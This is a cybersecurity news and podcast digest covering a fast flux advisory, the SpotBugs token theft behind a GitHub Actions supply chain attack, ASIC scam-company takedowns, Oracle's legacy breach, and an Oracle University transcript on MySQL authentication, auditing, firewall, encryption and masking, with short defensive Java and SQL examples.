Fast flux is a domain-based technique that enables malicious actors to rapidly change DNS records associated with a domain, effectively concealing the locations of malicious servers and creating resilient command and control infrastructure. This makes tracking and blocking such malicious activities extremely challenging for cybersecurity professionals.

"This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection," states the advisory. Threat actors employ two common variants: single flux, where a single domain links to numerous rotating IP addresses, and double flux, which adds an additional layer by frequently changing the DNS name servers responsible for resolving the domain.

The advisory highlights several advantages that fast flux networks provide to cybercriminals: increased resilience against takedown attempts, rendering IP blocking ineffective due to rapid address turnover, and providing anonymity that complicates investigations. Beyond command and control communications, fast flux techniques are also deployed in phishing campaigns and to maintain cybercriminal forums and marketplaces.

Notably, some bulletproof hosting providers now advertise fast flux as a service differentiator. One such provider boasted on a dark web forum about protecting clients from Spamhaus blocklists through easily enabled fast flux capabilities.

The advisory recommends organizations implement a multi-layered defense approach, including leveraging threat intelligence feeds, analyzing DNS query logs for anomalies, reviewing time-to-live values in DNS records, and monitoring for inconsistent geolocation. It also emphasizes the importance of DNS and IP blocking, reputation filtering, enhanced monitoring, and information sharing among cybersecurity communities.

"Organizations should not assume that their Protective DNS providers block malicious fast flux activity automatically, and should contact their providers to validate coverage of this specific cyber threat," the advisory warns.

Intelligence agencies are urging all stakeholders—both government and providers—to collaborate in developing scalable solutions to close this ongoing security gap that enables threat actors to maintain persistent access to compromised systems while evading detection.
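One of the advisory's recommendations, reviewing time-to-live values in DNS records, is easy to automate. Below is a hedged Java sketch using the third-party dnsjava library (org.xbill.DNS); the domain and threshold are placeholders, and a low TTL alone is not proof of fast flux, only a signal worth correlating with other indicators.

```java
import org.xbill.DNS.Lookup;
import org.xbill.DNS.Record;
import org.xbill.DNS.Type;

public class FastFluxCheck {
    public static void main(String[] args) throws Exception {
        String domain = "suspicious.example";   // placeholder domain
        long ttlThreshold = 300;                // seconds; tune to your environment

        Lookup lookup = new Lookup(domain, Type.A);
        Record[] records = lookup.run();
        if (records == null) {
            System.out.println("no A records / lookup failed: " + lookup.getErrorString());
            return;
        }
        for (Record r : records) {
            // Very low TTLs across many rotating IPs are one fast-flux signal.
            String flag = r.getTTL() < ttlThreshold ? "  <-- low TTL" : "";
            System.out.println(r.rdataToString() + " ttl=" + r.getTTL() + flag);
        }
    }
}
```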
SpotBugs Token Theft Revealed as Origin of Multi-Stage GitHub Supply Chain Attack
https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack/

Security researchers have traced the sophisticated supply chain attack that targeted Coinbase in March 2025 back to its origin point: the theft of a personal access token (PAT) associated with the popular open-source static analysis tool SpotBugs.

Palo Alto Networks Unit 42 revealed in their latest update that while the attack against cryptocurrency exchange Coinbase occurred in March 2025, evidence suggests the malicious activity began as early as November 2024, demonstrating the attackers' patience and methodical approach.

"The attackers obtained initial access by taking advantage of the GitHub Actions workflow of SpotBugs," Unit 42 explained. This initial compromise allowed the threat actors to move laterally between repositories until gaining access to reviewdog, another open-source project that became a crucial link in the attack chain.

Investigators determined that the SpotBugs maintainer was also an active contributor to the reviewdog project. When the attackers stole this maintainer's PAT, they gained the ability to push malicious code to both repositories.

The breach sequence began when attackers pushed a malicious GitHub Actions workflow file to the "spotbugs/spotbugs" repository using a disposable account named "jurkaofavak." Even more concerning, this account had been invited to join the repository by one of the project maintainers on March 11, 2025 – suggesting the attackers had already compromised administrative access.

Unit 42 revealed the attackers exploited a vulnerability in the repository's CI/CD process. On November 28, 2024, the SpotBugs maintainer modified a workflow in the "spotbugs/sonar-findbugs" repository to use their personal access token while troubleshooting technical difficulties. About a week later, attackers submitted a malicious pull request that exploited a GitHub Actions feature called "pull_request_target," which allows workflows from forks to access secrets like the maintainer's PAT.

This compromise initiated what security experts call a "poisoned pipeline execution" (PPE) attack. The stolen credentials were later used to compromise the reviewdog project, which in turn affected "tj-actions/changed-files" – a GitHub Action used by numerous organizations including Coinbase.

One puzzling aspect of the attack is the three-month delay between the initial token theft and the Coinbase breach. Security researchers speculate the attackers were carefully monitoring high-value targets that depended on the compromised components before launching their attack.

The SpotBugs maintainer has since confirmed the stolen PAT was the same token later used to invite the malicious account to the repository. All tokens have now been rotated to prevent further unauthorized access.

Security experts remain puzzled by one aspect of the attack: "Having invested months of effort and after achieving so much, why did the attackers print the secrets to logs, and in doing so, also reveal their attack?" Unit 42 researchers noted, suggesting there may be more to this sophisticated operation than currently understood.
ASIC Secures Court Orders to Shut Down 95 "Hydra-Like" Scam Companies
https://asic.gov.au/about-asic/news-centre/find-a-media-release/2025-releases/25-052mr-asic-warns-of-threat-from-hydra-like-scammers-after-obtaining-court-orders-to-shut-down-95-companies/

The Australian Securities and Investments Commission (ASIC) has successfully obtained Federal Court orders to wind up 95 companies suspected of involvement in sophisticated online investment and romance baiting scams, commonly known as "pig butchering" schemes.

ASIC Deputy Chair Sarah Court warned consumers to remain vigilant when engaging with online investment websites and mobile applications, describing the scam operations as "hydra-like" – when one is shut down, two more emerge in its place.

"Scammers will use every tool they can think of to steal people's money and personal information," Court said. "ASIC takes action to frustrate their efforts, including by prosecuting those that help facilitate their conduct and taking down over 130 scam websites each week."

The Federal Court granted ASIC's application after the regulator discovered most of the companies had been incorporated using false information. Justice Stewart described the case for winding up each company as "overwhelming," citing a justifiable lack of confidence in their conduct and management.

ASIC believes many of these companies were established to provide a "veneer of credibility" by purporting to offer genuine services. The regulator has taken steps to remove numerous related websites and applications that allegedly facilitated scam activity by tricking consumers into making investments in fraudulent foreign exchange, digital assets, or commodities trading platforms.

In some cases, ASIC suspects the companies were incorporated using stolen identities, highlighting the increasingly sophisticated techniques employed by scammers. These operations often create professional-looking websites and applications designed to lull victims into a false sense of security.

The action represents the latest effort in ASIC's ongoing battle against investment scams. The regulator reports removing approximately 130 scam websites weekly, with more than 10,000 sites taken down to date – including 7,227 fake investment platforms, 1,564 phishing scam hyperlinks, and 1,257 cryptocurrency investment scams.
Oracle Acknowledges "Legacy Environment" Breach After Weeks of Denial
https://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolen

Oracle has finally admitted to select customers that attackers breached a "legacy environment" and stole client credentials, according to a Bloomberg report. The tech giant characterized the compromised data as old information from a platform last used in 2017, suggesting it poses minimal risk.

However, this account conflicts with the evidence: the threat actor, known as "rose87168," posted records dating from late 2024 and 2025 on a hacking forum, and on March 20 listed 6 million data records for sale on BreachForums, including sample databases, LDAP information, and company lists allegedly stolen from Oracle Cloud's federated SSO login servers.

Oracle has reportedly informed customers that cybersecurity firm CrowdStrike and the FBI are investigating the incident. According to cybersecurity firm CybelAngel, Oracle told clients that attackers gained access to the company's Gen 1 servers (Oracle Cloud Classic) as early as January 2025 by exploiting a 2020 Java vulnerability to deploy a web shell and additional malware.

The breach, detected in late February, reportedly involved the exfiltration of data from the Oracle Identity Manager database, including user emails, hashed passwords, and usernames.

When initially questioned about the leaked data, Oracle firmly stated: "There has been no breach of Oracle Cloud. The published credentials are not for the Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data." However, cybersecurity expert Kevin Beaumont noted this appears to be "wordplay," explaining that "Oracle rebadged old Oracle Cloud services to be Oracle Classic. Oracle Classic has the security incident."

This is a public episode. If you would like to discuss this with other subscribers or get access to bonus episodes, visit edwinkwan.substack.com

Easy Prey
Understanding Ransomware and Defense Strategies

Easy Prey

Play Episode Listen Later Apr 9, 2025 41:20


When it comes to cybersecurity, most people think about firewalls, passwords, and antivirus software. But what about the attackers themselves? Understanding how they operate is just as important as having the right defenses in place. That's where Paul Reid comes in. As the Vice President of Adversary Research at AttackIQ, Paul and his team work to stay one step ahead of cybercriminals by thinking like them and identifying vulnerabilities before they can be exploited.   In this episode, we dive into the world of cyber threats, ransomware, and the business of hacking. Paul shares insights from his 25+ years in cybersecurity, including his experience tracking nation-state attackers, analyzing ransomware-as-a-service, and why cybercrime has become such a highly organized industry. We also talk about what businesses and individuals can do to protect themselves, from understanding threat intelligence to why testing your backups might save you from disaster. Whether you're in cybersecurity or just trying to keep your data safe, this conversation is packed with insights you won't want to miss. Show Notes: [00:58] Paul is the VP of Adversary Research at AttackIQ.  [01:30] His team wants to help their customers be more secure. [01:52] Paul has been in cybersecurity for 25 years. He began working with Novell networks and then moved to directory services with Novell and Microsoft, Active Directory, LDAP, and more.  [02:32] He also helped design classification systems and then worked for a startup. He also ran a worldwide threat hunting team. Paul has an extensive background in networks and cybersecurity.  [03:49] Paul was drawn to AttackIQ because they do breach and attack simulation. [04:22] His original goal was actually to be a banker. Then he went back to his original passion, computer science. [06:05] We learn Paul's story of being a victim of ransomware or a scam. A company he was working for almost fell for a money transfer scam. [09:12] If something seems off, definitely question it. [10:17] Ransomware is an economically driven cybercrime. Attackers try to get in through social engineering, brute force attacks, password spraying, or whatever means possible. [11:13] Once they get in, they find whatever is of value and encrypt it or do something else to extort money from you. [12:14] Ransomware as a service (RaaS) has brought ransomware to the masses. [13:49] We discuss some ethics in these criminal organizations. Honest thieves? [16:24] Threats look a lot more real when you see that they have your information. [17:12] Paul shares a phishing scam story with just enough information to make the potential victim click on it.  [18:01] There was a takedown of LockBit in early 2024, but they had a resurgence. It's a decentralized ransomware-as-a-service model that allows affiliates to keep on earning, even if the main operators go down. [20:14] Many of the affiliates are smash and grab; the nation-states are a little more patient.  [21:11] Attackers are branching out into other areas and expanding their attack surface, targeting Linux and macOS. [22:17] The resiliency of the ransomware-as-a-service setup and how they've distributed the risk across multiple affiliates. [23:42] There's an ever-growing attack surface and things are getting bigger. [25:06] AttackIQ is able to run emulations in a production environment. [26:20] Having the ability to continuously test and find new areas really makes networks more cyber resilient. [29:55] We talk about whether to pay ransoms and how to navigate these situations.  
[31:05] The best defense is due diligence: updates, patches, and backups kept separate from the system.  [35:19] Dealing with ransomware is a no-win situation. Everyone is different. Thanks for joining us on Easy Prey. Be sure to subscribe to our podcast on iTunes and leave a nice review.  Links and Resources: Podcast Web Page Facebook Page whatismyipaddress.com Easy Prey on Instagram Easy Prey on Twitter Easy Prey on LinkedIn Easy Prey on YouTube Easy Prey on Pinterest Paul Reid - Vice President, Adversary Research AttackIQ Paul Reid on LinkedIn AttackIQ Academy Understanding Ransomware Threat Actors: LockBit

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Feb 12th 2025: MSFT Patch Tuesday; Adobe Patches; FortiNet Acknowledges Exploitation of FortiOS

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

Play Episode Listen Later Feb 12, 2025 5:53


Microsoft Patch Tuesday
Microsoft released patches for 55 vulnerabilities. Three of them are categorized as critical, two are already exploited, and another two have been publicly disclosed. The LDAP server vulnerability could become a huge deal, but it is not clear if an exploit will appear. https://isc.sans.edu/diary/Microsoft%20February%202025%20Patch%20Tuesday/31674

Adobe Patches
Adobe released patches for seven products. Watch out in particular for the Adobe Commerce issues. https://helpx.adobe.com/security/security-bulletin.html

Fortinet Acknowledges Exploitation of Vulnerability
https://fortiguard.fortinet.com/psirt/FG-IR-24-535

Oracle University Podcast
MySQL Security - Part 2

Oracle University Podcast

Play Episode Listen Later Feb 4, 2025 16:20


Picking up from Part 1, hosts Lois Houston and Nikita Abraham continue their deep dive into MySQL security with MySQL Solution Engineer Ravish Patel. In this episode, they focus on user authentication techniques and tools such as MySQL Enterprise Audit and MySQL Enterprise Firewall.   MySQL 8.4 Essentials: https://mylearn.oracle.com/ou/course/mysql-84-essentials/141332/226362 Oracle University Learning Community: https://education.oracle.com/ou-community LinkedIn: https://www.linkedin.com/showcase/oracle-university/ X: https://x.com/Oracle_Edu   Special thanks to Arijit Ghosh, David Wright, Kris-Ann Nansen, Radhika Banka, and the OU Studio Team for helping us create this episode.   --------------------------------------------------------   Episode Transcript:

00:00 Welcome to the Oracle University Podcast, the first stop on your cloud journey. During this series of informative podcasts, we'll bring you foundational training on the most popular Oracle technologies. Let's get started!

00:25 Nikita: Welcome to the Oracle University Podcast! I'm Nikita Abraham, Team Lead of Editorial Services with Oracle University, and with me is Lois Houston, Director of Innovation Programs.

Lois: Hi everyone! Last week, we began exploring MySQL security, covering regulatory compliance and common security threats.

Nikita: This week, we're continuing the conversation by digging deeper into MySQL's user authentication methods and taking a closer look at some powerful security tools in the MySQL Enterprise suite.

00:57 Lois: And we're joined once again by Ravish Patel, a MySQL Solution Engineer here at Oracle. Welcome, Ravish! How does user authentication work in MySQL?

Ravish: MySQL authenticates users by storing account details in a system database. These accounts are authenticated with three elements: a username and a hostname, commonly separated with an @ sign, along with a password. The account identifier has the username and host. The host identifier specifies where the user connects from, as either a DNS hostname or an IP address. You can use a wildcard as part of the hostname or IP address if you want to allow this username to connect from a range of hosts. If the host value is just the percent-sign wildcard, then that username can connect from any host. Similarly, if you create the user account with an empty host, then the user can connect from any host.
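To make the username@host model concrete, here is a hedged Java/JDBC sketch that creates an account restricted to one address range; the connection URL, account name, and password are placeholders, and the MySQL Connector/J driver is assumed on the classpath.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;

public class CreateMySqlAccount {
    public static void main(String[] args) throws Exception {
        // Placeholder admin connection; adjust host and credentials to your server.
        try (Connection conn = DriverManager.getConnection(
                "jdbc:mysql://db.example.com:3306/", "root", System.getenv("MYSQL_ROOT_PW"));
             Statement st = conn.createStatement()) {

            // 'appuser' may connect only from the 10.0.% range; the same username
            // arriving from any other host is a different (non-existent) account.
            st.executeUpdate(
                "CREATE USER 'appuser'@'10.0.%' IDENTIFIED BY 'change-me'");

            // A host of '%' alone would allow any host; an empty host behaves the same way.
        }
    }
}
```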
01:55 Lois: Ravish, can MySQL Enterprise Edition integrate with an organization's existing accounts?

Ravish: MySQL Enterprise authentication integrates with existing authentication mechanisms in your infrastructure. This enables centralized account management, policies, and authentication based on group membership and assigned corporate roles, and MySQL supports a wide range of authentication plugins. If your organization uses Linux, you might already be familiar with PAM, also known as Pluggable Authentication Modules. This is a standard interface in Linux and can be used to authenticate to MySQL. Kerberos is another widely used standard for granting authorization using a centralized service. The FIDO Alliance, short for Fast Identity Online, promotes an interface for passwordless authentication. This includes methods for authenticating with biometrics or USB security tokens. And MySQL even supports logging into centralized authentication services that use LDAP, including a dedicated plugin to connect to Windows domains.

03:05 Nikita: So, once users are authenticated, how does MySQL handle user authorization?

Ravish: The MySQL privilege system uses the GRANT keyword. This grants some privilege X on some object Y to some user Z, and optionally gives you permission to grant the same privilege to others. These can be global administrative privileges that enable users to perform tasks at the server level, or they can be database-specific privileges that allow users to modify the structure or data within a database.

03:39 Lois: What about database privileges?

Ravish: Database privileges can be fine-grained from the largest to the smallest. At the database level, you can permit users to create, alter, and delete whole databases. The same privileges apply at the table, view, index, and stored procedure levels. In addition, you can control who can execute stored procedures and whether they do so with their own identity or with the privileges of the procedure's owner. For tables, you can control who can select, insert, update, and delete rows in those tables. You can even specify, at the column level, who can select, insert, and update data in those columns. Now, any privileged system carries with it the risk that you might forget an important password and lock yourself out. In MySQL, if you forget the password to the root account and don't have any other admin-level accounts, you will not be able to administer the MySQL server.

04:39 Nikita: Is there a way around this?

Ravish: There is a way around this as long as you have physical access to the server that runs the MySQL process. If you launch the MySQL process with the --skip-grant-tables option, then MySQL will not load the privilege tables from the system database when it starts. This is clearly a dangerous thing to do, so MySQL also implicitly disables network access when you use that option to prevent users from connecting over the network. When you use this option, any client connection to MySQL succeeds and has root privileges. This means you should control who has shell access to the server during this time, and you should restart the server or re-enable the privilege system with the FLUSH PRIVILEGES command as soon as you have changed the root password. The privileges we have already discussed are built into MySQL and are always available. MySQL also makes use of dynamic privileges, which are privileges that are enabled at runtime and which can be granted once they are enabled. In addition, plugins and components can define privileges that relate to features of those plugins. For example, the enterprise firewall plugin defines the firewall admin privilege, and the audit admin privilege is defined by the enterprise audit plugin.
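Continuing the JDBC sketch above, the GRANT statements below show the "privilege X on object Y to user Z" shape at database, table, and column scope; the schema and table names are invented for illustration.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;

public class GrantPrivileges {
    public static void main(String[] args) throws Exception {
        try (Connection conn = DriverManager.getConnection(
                "jdbc:mysql://db.example.com:3306/", "root", System.getenv("MYSQL_ROOT_PW"));
             Statement st = conn.createStatement()) {

            // Database-level: read access to every table in appdb.
            st.executeUpdate("GRANT SELECT ON appdb.* TO 'appuser'@'10.0.%'");

            // Table-level: modify rows in one table only.
            st.executeUpdate(
                "GRANT INSERT, UPDATE, DELETE ON appdb.orders TO 'appuser'@'10.0.%'");

            // Column-level: update just two columns of another table.
            st.executeUpdate(
                "GRANT UPDATE (status, notes) ON appdb.tickets TO 'appuser'@'10.0.%'");

            // Appending WITH GRANT OPTION would additionally let appuser
            // pass these privileges on to other accounts.
        }
    }
}
```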
You can control who has access to the audited events so that the audits themselves are protected. As well as configuring what you audit, you can also configure rotation policies so that unmonitored audit logs don't fill up your storage space. The configuration can be performed while the server is running with minimal effect on production applications. You don't need to restart the server to enable or disable auditing or to change the filtering options. You can output the audit logs in either XML or JSON format, depending on how you want to perform further searching and processing. If you need it, you can compress the logs to save space, and you can encrypt the logs to provide added protection of audited identities and data modifications. The extension is available either as a component or, if you prefer, as the legacy plugin. 07:53 Lois: But how does it all work? Ravish: Well, first, as a DBA, you'll enable the audit plugin and attach it to your running server. You can then configure filters to audit your connections and queries and record who does what, when they do it, and so on. Then once the system is up and running, it audits whenever a user authenticates, accesses data, or even when they perform schema changes. The logs are recorded in whatever format you have configured. You can then monitor the audited events at will with MySQL tools such as Workbench or with any software that can view and manipulate XML or JSON files. You can even configure Enterprise Audit to export the logs to an external Audit Vault, enabling collection and archiving of audit information from all over your enterprise. In general, you won't audit every action on every server. You can configure filters to control what specific information ends up in the logs. 08:50 Nikita: Why is this sort of filtering necessary, Ravish? Ravish: As a DBA, this enables you to create a custom-designed audit process to monitor things that you're really interested in. Rules can be general or very fine-grained, which enables you to reduce the overall log size, reduce the performance impact on the database server and underlying storage, and make it easier to process the log file once you've gathered data. Filters are configured with the easy-to-use JSON file format. 09:18 Nikita: So what information is audited? Ravish: You can see who did what, when they did it, what commands they used, and whether they succeeded. You can also see where they connected from, which can be useful when identifying man-in-the-middle attacks or stolen credentials. The log also records any available client information, including software versions and information about the operating system and much more. 09:42 Lois: Can you tell us about MySQL Enterprise Firewall, which I understand is a specific tool to learn and protect the SQL statements that MySQL executes? Ravish: MySQL Enterprise Firewall can be enabled on MySQL Enterprise Edition with a plugin. It uses an allow list to set policies for acceptable queries. You can apply this allow list to either specific accounts or groups. Queries are protected in real time. Every query that executes is verified per server and checked to make sure that it conforms to query structures that are defined in the allow list. This makes it very useful to block SQL injection attacks. Only transactions that match well-formed queries in the allow list are permitted. So any attempt to inject other types of SQL statements are blocked.
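A sketch of what that audit filter configuration can look like, assuming MySQL Enterprise Audit is installed with rule-based filtering enabled; the filter names and the account are invented:

-- Log everything, and make that the default for all accounts
SELECT audit_log_filter_set_filter('log_all', '{ "filter": { "log": true } }');
SELECT audit_log_filter_set_user('%', 'log_all');
-- A narrower filter that records only connection-class events (connects, disconnects)
SELECT audit_log_filter_set_filter('log_conn', '{ "filter": { "class": { "name": "connection" } } }');
SELECT audit_log_filter_set_user('appuser@localhost', 'log_conn');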
Not only does it block such statements, but it also sends an alert to the MySQL error log in real time. This gives you visibility into any security gaps in your applications. The Enterprise Firewall has a learning mode during which you can train the firewall to identify the correct sort of query. This makes it easy to create the allow list based on a known good workload that you can create during development before your application goes live. 10:59 Lois: Does MySQL Enterprise Firewall operate seamlessly and transparently with applications? Ravish: Your application simply submits queries as normal and the firewall monitors incoming queries with no application changes required. When you use the Enterprise Firewall, you don't need to change your application. It can submit statements as normal to the MySQL server. This adds an extra layer of protection in your applications without requiring any additional application code so that you can protect against malicious SQL injection attacks. This not only applies to your application, but also to any client that a configured user runs. 11:37 Nikita: How does this firewall system work? Ravish: When the application submits a SQL statement, the firewall verifies that the statement is in a form that matches the policy defined in the allow list before it passes to the server for execution. It blocks any statement that is in a form that's outside of policy. In many cases, a badly formed query can only be executed if there is some bug in the application's data validation. You can use the firewall's detection and alerting features to alert you when it blocks such a query, which will help you quickly detect such bugs, even when the firewall continues to block the malicious queries. 12:14 Lois: Can you take us through some of the encryption and masking features available in MySQL Enterprise Edition? Ravish: Transparent data encryption is a great way to protect against disclosure when physical security fails. If someone gains access to the database files on the file system through a vulnerability of the operating system, or even if you've had a laptop stolen, your data will still be protected. This is called Data at Rest Encryption. It protects not only the data rows in tablespaces, but also other locations that store some version of the data, such as undo logs, redo logs, binary logs and relay logs. It uses strong encryption based on the AES-256 algorithm. Once we enable transparent data encryption, it is, of course, transparent to the client software, applications, and users. Applications continue to submit SQL statements, and the encryption and decryption happen in flight. The application code does not need to change. All data types, table structure, and database names remain the same. It's even transparent to the DBAs. The same data types, table structures, and so on are still how the DBA interacts with the system while creating indexes, views, and procedures. In fact, DBAs don't even need to be in possession of any encryption keys to perform their admin tasks. It is entirely transparent. 13:32 Nikita: What kind of management is required for encryption? Ravish: There is, of course, some key management required at the outset. You must keep the keys safe and put policies in place so that you store and rotate keys effectively, and ensure that you can recover those keys in the event of some disaster. This key management integrates with common standards, including KMIP and KMS. 13:53 Lois: Before we close, I want to ask you about the role of data masking in MySQL.
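A minimal sketch of the firewall training flow and of switching on data-at-rest encryption; the sp_set_firewall_mode procedure ships with MySQL Enterprise Firewall, the account and table are hypothetical, and TDE assumes a keyring component is already configured:

-- Train the firewall: record this account's normal statements into its allow list
CALL mysql.sp_set_firewall_mode('appuser@localhost', 'RECORDING');
-- ...run the known-good workload during development, then switch to enforcement
CALL mysql.sp_set_firewall_mode('appuser@localhost', 'PROTECTING');
-- Transparent data encryption: encrypt an InnoDB table at rest
ALTER TABLE sales.orders ENCRYPTION = 'Y';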
Ravish: Data masking is when we replace some part of the private information with a placeholder. You can mask portions of a string based on the string position using the letter X or some other character. You can also create a table that contains a dictionary of suitable replacement words and use that dictionary to mask values in your data. There are specific functions that work with known formats of data, for example, social security numbers as used in the United States, national insurance numbers from the United Kingdom, and Canadian social insurance numbers. You can also mask various account numbers, such as primary account numbers like credit cards or IBAN numbers as used in the European banking system. There are also functions to generate random values, which can be useful in test databases. This might be a random number within some range, or an email address, or a compliant credit card number, or social security number. You can also create random information using the dictionary table that contains suitable example values. 14:58 Nikita: Thank you, Ravish, for taking us through MySQL security. We really cannot overstate the importance of this, especially in today's data-driven world. Lois: That's right, Niki. Cyber threats are increasingly sophisticated these days. You really have to be on your toes when it comes to security. If you're interested in learning more about this, the MySQL 8.4 Essentials course on mylearn.oracle.com is a great next step. Nikita: We'd also love to hear your thoughts on our podcast so please feel free to share your comments, suggestions, or questions by emailing us at ou-podcast_ww@oracle.com. That's ou-podcast_ww@oracle.com. In our next episode, we'll journey into the world of MySQL backups. Until then, this is Nikita Abraham… Lois: And Lois Houston, signing off! 15:51 That's all for this episode of the Oracle University Podcast. If you enjoyed listening, please click Subscribe to get all the latest episodes. We'd also love it if you would take a moment to rate and review us on your podcast app. See you again on the next episode of the Oracle University Podcast.
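For reference, a short sketch of the masking and random-generation functions Ravish describes, assuming the MySQL Enterprise Data Masking functions are installed; the outputs in the comments are indicative:

-- Mask everything except the last four characters with X
SELECT mask_inner('555-123-4567', 0, 4);   -- 'XXXXXXXX4567'
-- Format-aware masking for US social security numbers
SELECT mask_ssn('909-63-6922');            -- 'XXX-XX-6922'
-- Random but realistic values for test databases
SELECT gen_rnd_email();                    -- random address in the example.com domain
SELECT gen_rnd_pan();                      -- random Luhn-valid payment card number
SELECT gen_range(1000, 9999);              -- random integer within a range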

UNSECURITY: Information Security Podcast
Unsecurity Episode 232: Breachmas Recap with Mike "Pinky" Thompson

UNSECURITY: Information Security Podcast

Play Episode Listen Later Jan 10, 2025 37:59


Join us in the new year as FRSecure's Incident Response Manager, Pinky Thompson, joins us to recap Breachmas 2024. The group discusses LDAP, recent cyberattack trends, Evilginx, and more. Don't forget: The show is available in audio-only form wherever you listen to podcasts! Please send any questions, comments, or feedback to unsecurity@protonmail.com. About FRSecure https://frsecure.com/ FRSecure is a mission-driven information security consultancy headquartered in Minneapolis, MN. Our team of experts is constantly developing solutions and training to assist clients in improving the measurable fundamentals of their information security programs. These fundamentals are lacking in our industry, and while progress is being made, we can't do it alone. Whether you're wondering where to start, or looking for a team of experts to collaborate with you, we are ready to serve.

The BlueHat Podcast
Defending Against NTLM Relay Attacks with Rohit Mothe and George Hughey

The BlueHat Podcast

Play Episode Listen Later Jan 8, 2025 40:08


In this episode of The BlueHat Podcast, hosts Nic Fillingham and Wendy Zenone welcome back George Hughey and Rohit Mothe from the Microsoft Security Response Center (MSRC) to discuss their latest blog post on mitigating NTLM relay attacks by default. George and Rohit explain their roles in vulnerability hunting and delve into NTLM, a 40-year-old authentication protocol, outlining its vulnerabilities and the risks of relay attacks, which function as a type of man-in-the-middle exploit. They highlight Microsoft's move to a "secure by default" approach, ensuring mitigations like channel binding are enabled automatically, providing stronger protections across services like Exchange, Active Directory Certificate Services (ADCS), and LDAP.
In This Episode You Will Learn:
Steps users can take to enhance security in their environments
Why legacy protocols remain a challenge and what the future might hold
The challenges and successes of improving authentication security
Some Questions We Ask:
What is an NTLM relay attack, and how does it work?
Can you explain channel binding and its role in preventing NTLM relay attacks?
What challenges arise from modernizing authentication in complex environments?
Resources:
View George Hughey on LinkedIn
View Rohit Mothe on LinkedIn
View Wendy Zenone on LinkedIn
View Nic Fillingham on LinkedIn
Related Microsoft Podcasts:
Microsoft Threat Intelligence Podcast
Afternoon Cyber Tea with Ann Johnson
Uncovering Hidden Risks
Discover and follow other Microsoft podcasts at microsoft.com/podcasts

Oracle University Podcast
Introduction to MySQL

Oracle University Podcast

Play Episode Listen Later Jan 7, 2025 26:21


Join hosts Lois Houston and Nikita Abraham as they kick off a new season exploring the world of MySQL 8.4. Together with Perside Foster, a MySQL Principal Solution Engineer, they break down the fundamentals of MySQL, its wide range of applications, and why it's so popular among developers and database administrators. This episode also covers key topics like licensing options, support services, and the various tools, features, and plugins available in MySQL Enterprise Edition. ------------------------------------------------------------ Episode Transcript: 00:00 Welcome to the Oracle University Podcast, the first stop on your cloud journey. During this series of informative podcasts, we'll bring you foundational training on the most popular Oracle technologies. Let's get started! 00:26 Lois: Hello and welcome to the Oracle University Podcast! I'm Lois Houston, Director of Innovation Programs with Oracle University, and with me is Nikita Abraham, Team Lead: Editorial Services. Nikita: Happy New Year, everyone! Thank you for joining us as we begin a new season of the podcast, this time focused on the basics of MySQL 8.4. If you're a database administrator or want to become one, this is definitely for you. It's also great for developers working with data-driven apps or IT professionals handling MySQL installs, configurations, and support. 01:03 Lois: That's right, Niki. Throughout the season, we'll be delving into MySQL Enterprise Edition and covering a range of topics, including installation, security, backups, and even MySQL HeatWave on Oracle Cloud. Nikita: Today, we're going to discuss the Oracle MySQL ecosystem and its various components. We'll start by covering the fundamentals of MySQL and the different licenses that are available. Then, we'll explore the key tools and features to boost data security and performance. Plus, we'll talk a little bit about MySQL HeatWave, which is the cloud version of MySQL. 01:39 Lois: To take us through all of this, we've got Perside Foster with us today. Perside is a MySQL Principal Solution Engineer at Oracle. Hi Perside! For anyone new to MySQL, can you explain what it is and why it's so widely used? Perside: MySQL is a relational database management system that organizes data into structured tables, rows, and columns for efficient programming and data management. MySQL is transactional by nature. When storing and managing data, actions such as selecting, inserting, updating, or deleting are required. MySQL groups these actions into a transaction. The transaction is saved only if every part completes successfully. 02:29 Lois: Now, how does MySQL work under the hood? Perside: MySQL is a high-performance database that uses its default storage engine, known as InnoDB. InnoDB helps MySQL handle complex operations and large data volumes smoothly. 02:49 Nikita: For the unversed, what are some day-to-day applications of MySQL? How is it used in the real world? Perside: MySQL works well with online transaction processing workloads. It handles transactions quickly and manages large volumes of transactions at once. OLTP, with low latency and high throughput, makes MySQL ideal for high-speed environments like banking or online shopping. MySQL not only stores data but also replicates it from a main server to several replicas. 03:31 Nikita: That's impressive! And what are the benefits of using MySQL? Perside: It improves data availability and load balancing, which is crucial for businesses that need up-to-date information.
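As a quick illustration of the all-or-nothing transaction behavior Perside describes, here is a minimal SQL sketch; the accounts table is hypothetical:

-- Both updates are saved together, or neither is
START TRANSACTION;
UPDATE accounts SET balance = balance - 100 WHERE id = 1;
UPDATE accounts SET balance = balance + 100 WHERE id = 2;
COMMIT;   -- a ROLLBACK here would discard both changes instead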
MySQL replication supports read scale-out by distributing queries across servers, which increases availability. MySQL is the most popular database on the web. 04:00 Lois: And why is that? What makes it so popular? What sets it apart from the other database management systems? Perside: First, it is a relational database management system that supports SQL. It also works as a document store, enabling the creation of both SQL and NoSQL applications without the need for separate NoSQL databases. Additionally, MySQL offers advanced security features to protect data integrity and privacy. It also uses tablespaces for better disk space management. This gives database administrators total control over their data storage. MySQL is simple, solid in its reliability, and secure by design. It is easy to use and ideal for both beginners and professionals. MySQL is proven at scale by efficiently handling large data volumes and high transaction rates. MySQL is also open source. This means anyone can download and use it for free. Users can modify the MySQL software to meet their needs. However, it is governed by the GNU General Public License, or GPL. GPL outlines specific rules for its use. MySQL offers two major editions. For developers and small teams, the Community Edition is available for free and includes all of the core features needed. For large enterprises, the Commercial Edition provides advanced features, management tools, and dedicated technical support. 05:58 Nikita: Ok. Let's shift focus to licensing. Who is it useful for? Perside: MySQL licensing is essential for independent software vendors. They're called ISVs. And original equipment manufacturers, they're called OEMs. This is because these companies often incorporate MySQL code into their software products or hardware systems to boost the functionality and performance of their products. MySQL licensing is equally important for value-added resellers. We call those VARs. And also, it's important for other distributors. These groups bundle MySQL with other commercially licensed software to sell as part of their product offering. The GPL v2 license might suit Open Source projects that distribute their products under that license. 07:02 Lois: But what if some independent software vendors, original equipment manufacturers, or value-added resellers don't want to create Open Source products? They don't want their source to be publicly available and they want to keep it private? What happens then? Perside: This is why Oracle provides a commercial licensing option. This license allows businesses to use MySQL in their products 